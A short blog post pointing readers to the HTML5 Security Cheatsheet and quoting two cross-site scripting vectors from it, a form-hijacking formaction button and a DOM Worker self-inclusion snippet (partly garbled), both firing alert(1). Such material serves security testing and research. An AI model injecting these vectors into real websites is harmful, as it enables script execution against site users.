Skip to content

HTML5 Security Cheatsheet

Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.

For Example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Self-including DOM Worker XSS
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
0?<script>Worker("#").onmessage=function()eval(.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
Self-hijacking JSON literals
In case parts of a JSON literal are controlled by user input there’s a risk to allow auto-harvesting values from later object members.


No Trackbacks


Display comments as Linear | Threaded

No comments

Add Comment

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.

Textile-formatting allowed
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.
Form options

Submitted comments will be subject to moderation before being displayed.

Imprint | Contact | Privacy Statement